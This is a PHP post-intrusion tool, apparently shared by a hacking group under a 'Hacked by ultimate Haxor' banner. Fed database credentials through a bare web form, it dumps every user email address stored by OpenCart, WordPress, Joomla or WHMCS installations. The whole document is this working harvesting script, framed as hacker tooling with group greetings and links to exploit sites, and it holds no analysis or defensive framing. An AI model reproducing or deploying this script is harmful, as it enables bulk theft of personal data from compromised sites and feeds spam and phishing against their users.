Hacked by ultimate Haxor

1. <?php
2. /*
3. * Title : Extract Emails From [ OpenCart - JooMla - Wordpress - WHMCS]
4. * Coded By : xSecurity
5. * Email & Skype : b0x@hotmail.com ~ b0x-sa
6. * Greets : Mr.Dm4r - No-QRQR - b0x - DameneDz - FoX HaCkEr - r0kin - RAB3OUN - Lov3rDNS - DeeF - abolalh - Group x3 - All Members ~
7. * Homepages : sec4ever.com - is-sec.com - xsec-labs.com - Exploit4ar.com
8. * My Profile in Exoloit4ar [ http://www.exploit4ar.com/author/51 ]
9. */
10. set_time_limit(0);
11. error_reporting(0);
12. echo "
13. <body bgcolor='#CECECE'>
14. <form method='GET'>
15. <title>Extract Emails From [ OpenCart - WordPress - Joomla - WHMCS ]</title>
16. <p align='center' dir='ltr'>
17. <b><font face='Tahoma' size='6'>Extract Email'z From</font></b></p>
18. <p align='center' dir='ltr'>
19. <font size='2' face='Verdana'>[</font><font face='Verdana' color='#FF0000' size='2'>
20. </font><font face='Verdana' size='2' color='#606060'>
21. <a href='?xsec=wordpress' style='text-decoration: none'>
22. <font color='#606060'>WordPress</font></a> -
23. <a href='?xsec=joomla' style='text-decoration: none'><font color='#606060'>
24. Joomla</font></a> - <a href='?xsec=opencart' style='text-decoration: none'>
25. <font color='#606060'>OpenCart</font></a> -
26. <a href='?xsec=whmcs' style='text-decoration: none'><font color='#606060'>
27. WHMCS</font></a> </font><font size='2' face='Verdana'>]</font></p></form></body>";
28.  
29. $host = $_POST['host'];
30. $data = $_POST['data'];
31. $user = $_POST['user'];
32. $pass = $_POST['pass'];
33. $dbprefix = $_POST['dbprefix'];
34.  
35. # Command MySQL
36. $cart = "SELECT `email` FROM `oc_user`";
37. $wp = "SELECT `user_email` FROM `wp_users`";
38. $j0 = 'SELECT `email` FROM `'.$dbprefix.'users` GROUP BY `email` ORDER BY `email`';
39. $whm = "SELECT `email` FROM `tblclients`";
40.  
41. # function connect MySQL & Select DB
42. function connect($host,$data,$user,$pass) {
43. $co = @mysql_connect($host,$user,$pass) or die(mysql_error());
44. $da = @mysql_select_db($data) or die(mysql_error());
45. return $co;
46. }
47.  
48. # OpenCart
49. if($_GET['xsec'] == 'opencart') {
50. echo "
51. <form method='POST'><center>
52. localhost:<input type='text' name='host' value=''><br>
53. database:<input type='text' name='data' value=''><br>
54. username:<input type='text' name='user' value=''><br>
55. password:<input type='text' name='pass' value=''><br>
56. <input type='submit' value='Executre'></p></center></form>";
57. echo "<p align='center' dir='ltr'><textarea cols='35' rows='18'>";
58. if(connect($host, $data, $user, $pass)) {
59. $cmd1 = @mysql_query($cart);
60. while($emails1 = @mysql_fetch_array($cmd1)) {
61. echo "{$emails1[email]}\n"; }
62. echo "</textarea>"; } }
63.  
64. # Wordpress
65. if($_GET['xsec'] == 'wordpress') {
66. echo "<form method='POST'><center>
67. localhost:<input type='text' name='host' value=''><br>
68. database:<input type='text' name='data' value=''><br>
69. username:<input type='text' name='user' value=''><br>
70. password:<input type='text' name='pass' value=''><br>
71. <input type='submit' value='Executre'></center></form>";
72. echo "<p align='center' dir='ltr'><textarea cols='35' rows='18'>";
73. if(connect($host, $data, $user, $pass)) {
74. $cmd2 = @mysql_query($wp);
75. while($emails2 = @mysql_fetch_array($cmd2)) {
76. echo "{$emails2[user_email]}\n"; }
77. echo "</textarea>"; } }
78.  
79. # Joomla
80. if($_GET['xsec'] == 'joomla') {
81. echo "<form method='POST'><center>
82. localhost:<input type='text' name='host' value=''><br>
83. database:<input type='text' name='data' value=''><br>
84. username:<input type='text' name='user' value=''><br>
85. password:<input type='text' name='pass' value=''><br>
86. <input type='text' name='dbprefix' value='prefix_'>
87. <input type='submit' value='Executre'></center></form>";
88. echo "<p align='center' dir='ltr'><textarea cols='35' rows='18'>";
89. if(connect($host, $data, $user, $pass)) {
90. $cmd3 = @mysql_query($j0);
91. while($emails3 = @mysql_fetch_array($cmd3)) {
92. echo "{$emails3[email]}\n"; }
93. echo "</textarea>"; } }
94.  
95. # WHMCS
96. if($_GET['xsec'] == 'whmcs') {
97. echo "<form method='POST'><center>
98. localhost:<input type='text' name='host' value=''><br>
99. database:<input type='text' name='data' value=''><br>
100. username:<input type='text' name='user' value=''><br>
101. password:<input type='text' name='pass' value=''><br>
102. <input type='submit' value='Executre'></center></form>";
103. echo "<p align='center' dir='ltr'><textarea cols='35' rows='18'>";
104. if(connect($host, $data, $user, $pass)) {
105. $cmd4 = @mysql_query($whm);
106. while($emails4 = @mysql_fetch_array($cmd4)) {
107. echo "{$emails4[email]}\n"; }
108. echo "</textarea>"; }
109. }
110. echo "<p align='center' dir='ltr'>
111. <font face='Verdana' size='1'>Coded By :<font color='#FF0000'> xSecurity</font>
112. ~ Skype :<font color='#FF0000'> b0x-sa</font></font></p>
113. <p align='center' dir='ltr'>
114. <font face='Verdana' size='1'>Greets : </font>
115. <font SIZE='1' face='Verdana' color='#FF0000'>Mr.Dm4r - No-QRQR - b0x -
116. DameneDz - FoX HaCkEr - r0kin - RAB3OUN - Lov3rDNS - DeeF - abolalh - Group
117. x3 - All Members</font><font SIZE='1' COLOR='#606060' face='Verdana'> ~</font></p>
118. <p align='center' dir='ltr'>
119. <font face='Verdana' size='1'>Homepage :</font><font face='Verdana' size='1' color='#0099CC'>
120. </font><font face='Verdana' size='1' color='#606060'>
121. <a href='http://www.sec4ever.com' style='text-decoration: none'>
122. <font color='#0099CC'>www.sec4ever.com</font></a></font><font face='Verdana' size='1' color='#0099CC'>
123. </font><font face='Verdana' size='1'>-</font><font face='Verdana' size='1' color='#0099CC'>
124. </font><font face='Verdana' size='1' color='#606060'>
125. <a href='http://www.is-sec.com' style='text-decoration: none'>
126. <font color='#0099CC'>www.is-sec.com</font></a></font></p>";
127.  
128. ?>